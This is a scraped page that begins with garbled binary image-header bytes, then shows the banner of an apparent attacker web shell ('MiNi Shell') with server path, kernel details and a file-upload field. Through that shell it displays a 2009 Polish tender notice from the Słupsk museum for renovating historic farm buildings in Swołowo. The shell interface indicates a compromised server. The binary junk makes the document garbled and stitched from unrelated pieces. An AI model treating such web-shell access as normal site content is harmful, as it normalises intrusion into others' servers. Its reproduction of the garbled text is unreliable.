JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/227536-N-2009.html

<p class="kh_header"><b>Słupsk: Roboty budowlane związane z przebudową, renowacją i adaptacją obiektów zabytkowych, zlokalizowanych w Swołowie gm. Słupsk, realizowane w ramach zadania inwestycyjnego  pn. Wzmocnienie potencjału Pomorskiej Krainy w Kratę - Etap II - rozbudowa filii MPŚ w  Swołowie. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu samorządu województwa pomorskiego - dla potrzeb Muzeum Pomorza Środkowego w Słupsku.</b><br>
<b>Numer ogłoszenia: 227536 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Pomorza Środkowego w Słupsku , ul. Dominikańska 5-9, 76-200 Słupsk, woj. pomorskie, tel. 059 8424081/82 w. 320, 8463020, faks 059 8426518.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane związane z przebudową, renowacją i adaptacją obiektów zabytkowych, zlokalizowanych w Swołowie gm. Słupsk, realizowane w ramach zadania inwestycyjnego  pn. Wzmocnienie potencjału Pomorskiej Krainy w Kratę - Etap II - rozbudowa filii MPŚ w  Swołowie. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu samorządu województwa pomorskiego - dla potrzeb Muzeum Pomorza Środkowego w Słupsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiot niniejszego zamówienia jest wyłonienie Generalnego Wykonawcy robót budowlanych, związanych z translokacją, przebudową, renowacją i adaptacją obiektów zabytkowych, stanowiących własność Zamawiającego i zlokalizowanych w miejscowości Swołowo, Gm. Słupsk oraz wykonanie dokumentacji geodezyjnej powykonawczej. Miejscowość Swołowo  oddalona jest od miasta Słupska ok. 12 km, na terenie której zlokalizowana jest jednostka organizacyjna Zamawiającego tj. Oddział Etnografii- Młyn Zamkowy i Zagroda Muzealna w Swołowie. Wieś Swołowo znajduje się w granicach zespołu przyrodniczo-krajobrazowego Krainy w Kratę. Wykonawca zabezpieczy na własny koszt obsługę geodezyjną i sporządzi inwentaryzację geodezyjną  powykonawczą na mapie w skali 1:500.
2. Obiekty, o których mowa w pkt. 1 objęte robotami budowlanymi, dla których na potrzeby opracowania dokumentacji - projektu budowlano wykonawczego, przyjęto symboliczne oznaczenie, to:
a/ Budynek gospodarczy z piecem chlebowym -	oznaczony symbolem B1;
b/ Stodoła pomorska - oznaczona symbolem B2;
c/ Chałupa zagrodnika -oznaczona symbolem B3;
d/ Dom chlebowy -	oznaczony symbolem B4;
e/ Stodoła - oznaczona symbolem B5;
f/ Obora	- oznaczona symbolem B6;
g/ Kuźnia	-oznaczona symbolem B7;
h/ Budynek gospodarczy z chłodnią -oznaczony symbolem B8.	
W/w są obiektami zabytkowymi i stanowią własność Zamawiającego, na które Zamawiający posiada wymagane dokumenty. Niektóre z w/w obiektów, decyzją Pomorskiego Wojewódzkiego Konserwatora Zabytków, wpisane zostały do rejestru zabytków i tak:
a/ Stodoła pomorska - decyzja nr PWKZ.R.4190/5/577/2008 z dnia 12.03.2008, nr rej.  A-1826;
b/ Chałupa zagrodnika - decyzja nr PWKZ.R.4190/3/575/2008 z dnia 12.03.2008, nr rej.  A-1828;
c/ Stodoła - decyzja nr PWKZ.R.4190/2/514/2008 z dnia 04.03.2008, nr rej. A-1824;
d/ Obora - decyzja nr PWKZ.R.4190/4/576/2008 z dnia 12.03.2008, nr rej. A-1827;
e/ Kuźnia - decyzją nr PWKZ.R.4190/13/1520/2008 z dnia 11.07.2008r. nr rej. A-1832.Obiekty są zlokalizowane w dwóch zespołach, a teren inwestycji objęty jest ochroną konserwatorską. Jeden zespół obejmuje działkę nr 32/1, a drugi działki nr 33/4 i 35/1. Budynki oznaczone symbolem: B2, B3 i B6 pozostają bez zmian, w miejscu swojej pierwotnej lokalizacji, natomiast budynki oznaczone symbolem: B1, B5, B7 i B8  będą przenoszone w inne lokalizacje, na teren filii Muzeum Pomorza Środkowego. Po zakończeniu robót budowlanych budynki będą pełniły funkcje muzealną, w której zlokalizowane zostaną stałe ekspozycje muzealne jak również odbywać się będą zajęcia i pokazy rękodzieła ludowego.
Zamawiający posiada decyzją administracyjną Nr 31/09, wydaną w dniu 15.01.2009r. przez Starostę Powiatu Słupskiego - pozwolenie na budowę.
Roboty budowlane realizowane będą przy pomocy programu finansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa pomorskiego na lata 2007 - 2013, Oś Priorytetowa 6, działanie 6.3. oraz budżetu samorządu województwa pomorskiego. 
Roboty budowlane Wykonawca zobowiązany jest wykonać zgodnie z dokumentacją:
- Projektem Budowlanym Wykonawczym,
- Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót, opracowane przez jednostkę projektową:  Inwestprojekt - Słupsk  Spółka z o.o. z siedzibą w Słupsku, ul. Kaszubska Nr 45, 76-200 Słupsk, 
3. Zakres rzeczowy przedmiotu zamówienia.
Roboty budowlane obiektów zabytkowych, stanowiące przedmiot niniejszego postępowania obejmują:
3.1.Budynek gospodarczy z piecem chlebowym - B1:
Budynek posadowiony na fundamencie z kamienia łupanego. Ściany budynku mieszczącego piekarnik z cegły ceramicznej, ściany w pozostałej części budynku szkieletowe. 
Dane techniczne:
-Liczba kondygnacji nadziemnych		1
-Powierzchnia zabudowy			116,96 m2    
-Kubatura				579,7 m3			
W budynku wprowadzić należy nową instalację elektryczną, teletechniczną. Po rekonstrukcji budynek będzie funkcję muzealną oraz edukacyjną. 
3.2. Budynek Stodoły pomorskiej - B2.
Budynek o konstrukcji szkieletowej, częściowo podpiwniczony.
- Liczba kondygnacji nadziemnych		2
- Powierzchnia zabudowy			423,6 m 2 
- Kubatura 				2.758,0 m 3 
Przebudowa z zachowanie historycznego kształtu. Po rekonstrukcji budynek stodoły pełnić będzie docelowo funkcję wystawowo-konferencyjną. W budynku wykonać należy nową instalację elektryczną, teletechniczną, wodno-kanalizacyjną i centralnego ogrzewania oraz wentylacje mechaniczną.
3.3. Budynek Chałupy zagrodnika- B3 .
Budynek o konstrukcji szkieletowej.
- Liczba kondygnacji nadziemnych 		1
- Powierzchnia zabudowy 			122,7 m 2 
- Kubatura 				662,0 m 3 
Chałupa mieszkalna z połowy XIX w, parterowa z niską piwniczką. Istniejący budynek po remoncie będzie pełnił wyłącznie funkcję ekspozycyjną. W budynku wykonać należy nową instalację elektryczna, teletechniczną, wodno-kanalizacyjna, centralnego ogrzewania, wentylacji mechanicznej.
3.4. Budynek Domu chlebowego - B4.
Budynek  o konstrukcji szkieletowej tzw. szachulcowej. Budynek domu chlebowego zrekonstruowany zostanie na podstawie tzw. białej karty konserwatorskiej, na działce nr 32/1. 
- Liczba kondygnacji nadziemnych		1
- Powierzchnia zabudowy			29,52 m 2 
- Kubatura				118,11m 3 
Układ konstrukcyjny budynku pozostaje bez zmian. W obiekcie wykonać należy instalacje elektryczna, teletechniczną. Obiekt zachowa swoja pierwotna funkcję i organizowane w nim będą pokazy wypieku chleba. 
3.5. Budynek  stodoły - B5
Budynek o konstrukcji szkieletowej, słupowo-ryglowej.
- Liczba kondygnacji nadziemnych		1
- Powierzchnia zabudowy 			171,50 m 2 
- Kubatura				887,00 m 3 
Przebudowa obiektu , z zachowaniem historycznego kształtu i architektury. Do obiektu doprowadzona zostanie instalacja elektryczna, instalacja teletechniczna, wodno-kanalizacyjna oraz centralnego ogrzewania. Po rekonstrukcji budynek pełnić będzie funkcję wystawową, z zapleczem gospodarczym na antresoli. 
3.6. Budynek obory - B6.
Budynek o konstrukcji częściowo szkieletowej i częściowo murowanej. 
- Liczba kondygnacji nadziemnych		2
- Powierzchnia zabudowy			183,60 m 2 
- Kubatura				1.234,13 m 3 
Po rekonstrukcji budynek pełnić będzie funkcję administracyjno-biurową. W budynku wykonać należy nowa instalacje elektryczną i teletechniczną, instalacje wodno-kanalizacyjną i centralnego ogrzewania. W budynku mieścić się będzie kotłownia, opalana biomasą. 
3.7. Budynek Kuźni - B7
Budynek o konstrukcji szachulcowej z kwaterami wypełnionymi cegłą czerwoną pełną. Budynek po przeniesieniu złożony zostanie na działce Nr 32/1. 
- Liczba kondygnacji nadziemnych		1
- Powierzchnia zabudowy			40,40 m 2
- Kubatura				135,75 m3 
Obiekt zachowa swoją pierwotną funkcję i wyposażenie, w którym organizowane będą pokazy pracy kowala. W budynku wykonać należy instalację elektryczną i teletechniczną. 
3.8. Budynek gospodarczy z chłodnią - B8
Budynek gospodarczy z chłodnią lodownią jest w części lodownia obiektem przeniesionym z działki nr 40 na działkę nr 33/4.  Konstrukcja budynku gospodarczego szkieletowa- szachulec, z wypełnieniem kwater żerdkami obrzuconymi gliną z sieczką. Ściany chłodni wykonane z kamienia łupanego. 
- Liczba kondygnacji nadziemnych		1
- Powierzchnia zabudowy			114,49 m 2
- Kubatura				452,50 m3 
Budynek jest odtworzeniem budynku składającego się z dwóch niezależnych części: chłodni z poddaszem oraz części gospodarczej z poddaszem gospodarczym. Obiekt pełnić będzie funkcję ekspozycyjną.  W budynku wykonać należy instalację elektryczną i teletechniczną. 				
3.9. Zagospodarowanie terenu.
Zagospodarowanie terenu obejmuje:
a/ działkę Nr 32/1 wraz z zespołem obiektów B3, B4, B7:  
- o pow. ogółem					0,1680 ha
- pow. zabudowy					197,0 m 2 
- pow. terenów utwardzonych			1.008, 98 m 2 
- pow. terenów zielonych 				1.274,0 m2 

b/ działki nr 35/1 oraz działkę nr 33/4 wraz z zespołem obiektów B1, B2, B5, B6 i B8:
- pow. ogółem					0,4559 ha
- pow. zabudowy					1.010,3 m 2 
- pow. terenów utwardzonych			1.373,0 m 2
- pow. terenów zielonych				2.175,7 m 2 
Roboty związane z zagospodarowaniem terenu wykonane zostaną po zakończeniu wszystkich robót budowlanych. Istniejące budynki będą przebudowywane, odrestaurowane i zaadaptowane do funkcji muzealnych, konferencyjnych i technicznych. Budynki przenoszone z innych lokalizacji będą rekonstruowane wg inwentaryzacji w projektowanych lokalizacjach. Istniejące ukształtowanie terenu pozostanie bez większych zmian. Zaprojektowano nowe przyłącza i oświetlenie zewnętrzne wg opracowań branżowych. Odwodnienie terenu powierzchniowe - do gruntu. Drogi dojazdowe i ścieżki piesze - wg projektu. 
3.10. Roboty instalacyjne
1. Wodociąg.
2. Kanalizacja sanitarna. 
3. Sieć centralnego ogrzewania.
4. Wewnętrzna instalacja centralnego ogrzewania.  
5. Instalacja wentylacji mechanicznej.
6. Instalacja wod - kan.
7. Kotłownia.
Powyższe roboty instalacyjne należy wykonać zgodnie z opracowana dokumentacją projektowo-techniczną dla danej branży, obowiązującymi normami i przepisami oraz zgodnie ze sztuka budowlaną.
3.11. Roboty elektryczne.
1. Linie kablowe zalicznikowe główne i obwodowe.
2. Oświetlenie terenu.
3. Instalacje elektryczne wewnętrzne w budynkach B1-B8.
Powyższe roboty należy wykonać zgodnie z dokumentacją projektowo-techniczną, obowiązującymi normami i przepisami oraz zgodnie ze sztuka budowlaną.
3.12. Roboty w zakresie instalacji teletechnicznych.
1. Instalacja sygnalizacji pożaru.
2. Instalacja sygnalizacji włamania.
3. Instalacja CCTV..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.40.00.00-1, 45.45.00.00-6, 29.81.43.30-0, 45.23.32.11-1, 45.11.27.10-5, 45.11.12.91-4, 45.11.27.10-5, 45.23.32.00-1, 45.12.21.40-5, 45.33.10.00-6, 45.33.11.00-7, 45.33.00.00-9, 45.23.24.60-4, 45.33.24.00-7, 45.31.11.00-1, 45.31.53.00-1, 45.31.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w prowadzonym postępowaniu.
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 100.000,00 złotych, słownie: sto tysięcy  złotych.
3. Wykonawca wnosi wadium: 
3.1) w pieniądzu, sposób przekazania:  przelewem na konto Zamawiającego w BS Ustka, nr konta: 15931500040050244520000010 lub w jednej z poniżej podanych form: 
3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,  
3.3) w gwarancjach bankowych,  
3.4) w gwarancjach ubezpieczeniowych  
3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.) sposób przekazania: w kasie Zamawiającego. 
4. Wadium wnosi się przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.  
5. Z udziału w postępowaniu wyklucza się wykonawców, którzy nie nieśli wadium w wymaganym terminie. 
6. Zamawiający zwraca niezwłocznie wadium przypadkach określonych na podstawie  art. 46 ustawy Pzp. 
7. Zamawiający zatrzymuje wadium w przypadku zaistnienia okoliczności określonych w art. 46 ust. 4a ustawy Pzp.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zamawiający wymaga, aby Wykonawca spełniał niżej określone warunki ogólne i szczegółowe:
1.1. Warunki ogólne.
1.1.1. Wykonawca musi spełniać warunki określone w art. 22 ust. 1 pkt.1 i 2 ustawy Pzp. tj.:
1)posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania przedmiotu zamówienia (art. 22 ust.1 pkt. 2 Pzp) tj.:
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.2. Wykonawca nie może podlegać wykluczeniu z ubiegania się o zamówienie   publiczne na podstawie  art. 24 ust. 1 i ust. 2 ustawy Pzp.
1.3. W przypadku Wykonawców składających wspólną ofertę warunki opisane w pkt .1.2. musi spełniać każdy z Wykonawców składających wspólną ofertę.
1.4. Udzielą 36 miesięcznej pisemnej gwarancji jakości na wykonany przedmiot zamówienia oraz 36 miesięcznej rękojmi, licząc od dnia przyjęcia przedmiotu zamówienia przez Zamawiającego.
2.Z postępowania o udzielenie zamówienia wyklucza się:
2.1.wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym przeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
2.2.wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
2.3.wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2.4.osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających nas celu popełnienie przestępstwa lub przestępstwa skarbowego;
2.5.spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku, mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
2.6.spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku, mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
2.7.spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku, mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
2.8.osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku, mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
2.9.podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 
2.10.wykonawców, którzy nie spełniają warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1-3.
3.Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
3.1.wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; 
3.2.złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
3.3.nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub
dokumentów potwierdzających spełnianie tych warunków lub złożone     
dokumenty zawierają błędy;
3.4.nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub
nie zgodzili się na przedłużenie okresu związania ofertą.
4.Zamawiający zawiadamia niezwłocznie wykonawcę o wykluczeniu z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
5.Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
6.Warunki szczegółowe.
6.1.Potencjał ekonomiczno-finansowy.
Wykonawca musi wykazać:
a)że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia i udokumentują obrót netto za rok 2008 w wysokości co najmniej
4,00 mln złotych;
b) posiadanie ważnego i aktualnego ubezpieczenia od odpowiedzialności cywilnej w 
zakresie prowadzonej działalności gospodarczej, zgodnej z przedmiotem
 niniejszego zamówienia:
- z tytułu odpowiedzialności deliktowej na kwotę nie mniejszą niż wartość brutto
składanej oferty,
- z tytułu odpowiedzialności kontraktowej na kwotę nie mniejszą niż 1,0 mln zł, tzn. posiada na dzień wszczęcia postępowania pełną ochronę ubezpieczeniową OC zakładu ubezpieczeniowego.
c) posiadają dostęp do środków finansowych kwocie minimum 40% zaproponowanej
ceny ofertowej
6.2.Potencjał kadrowy
Wykonawcy zobowiązani są wykazać, że dysponują lub będą dysponowali po minimum 1 osobie z uprawnieniami budowlanymi o specjalnościach w zakresie instalacji sanitarnych, elektrycznych oraz 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń o specjalności konstrukcyjno-budowlanej przy czym osoba ta odbyła co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust.1 rozporządzenia Ministra Kultury z dnia 9czerwca 2004r. (Dz.U. Nr 150 z 2004r. poz.1579) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych. Osoba pełniąca funkcje kierownika budowy zobowiązana będzie złożyć oświadczenie, którego wzór stanowi Załącznik nr 10 do SIWZ.
6.3.Doświadczenie zawodowe.
Wykonawcy zobowiązani są wykazać, że zrealizowali (rozpoczęli i zakończyli) w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej trzech robót budowlanych na obiektach zabytkowych, wpisanych do rejestru zabytków, , w tym jednej roboty budowlanej w obiektach zabytkowych, wpisanych do rejestru zabytków o drewnianej konstrukcji szkieletowej, z tradycyjnym wypełnieniem ścian w technologii szachulcowej o charakterze, wielkości i wartości odpowiadającym obiektom stanowiącym przedmiot niniejszego zamówienia tj. B5 - stodoła lub B3 chałupa zagrodnika. Do wykazu Wykonawcy zobowiązani są dołączyć aktualne referencje, wydane przez zamawiających potwierdzające, że zamówienia wymienione w wykazie zostały wykonane  należycie. Doświadczenie Wykonawców składających wspólną ofertę winny spełniać łącznie wszystkie podmioty składające wspólną ofertę.
6.4.Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu.
1) Na potwierdzenie spełnienia w/w warunków Wykonawca dołączy do oferty oświadczenie i dokumenty wymienione w Rozdziale VIII SIWZ  Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana przez Zamawiającego w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające komplet ważnych oświadczeń i dokumentów, wymaganych niniejsza Specyfikacją, wg formuły: spełnia - nie spełnia.
2) W toku oceny spełniania warunków udziału w postępowaniu Zamawiający, o ile zajdzie taka  potrzeba:
- wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich złożenia, uzupełnienia oferta podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania (art. 26, ust. 3 ustawy Pzp);
